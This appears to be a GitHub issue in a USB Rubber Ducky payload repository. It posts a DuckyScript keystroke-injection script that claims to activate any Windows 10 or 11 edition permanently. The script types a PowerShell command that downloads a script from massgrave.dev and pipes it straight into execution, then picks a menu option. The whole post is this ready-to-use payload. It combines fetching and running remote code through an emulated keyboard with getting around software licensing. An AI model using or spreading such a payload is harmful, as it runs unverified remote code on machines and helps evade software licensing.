hak5/usbrubberducky-payloads

Activate Windows Script

TheExpertNoob opened this issue · 1 comments

REM Simple script to activate windows 10 or 11 of any flavor permanently.
GUI r
DELAY 100
STRING powershell iwr -useb https://massgrave.dev/get | iex
ENTER
REM This delay may need to be adjusted longer depending on internet and computer speed.
DELAY 10000
STRING 1
ENTER

I should read up on how to submit examples. 😅 Pull request submitted.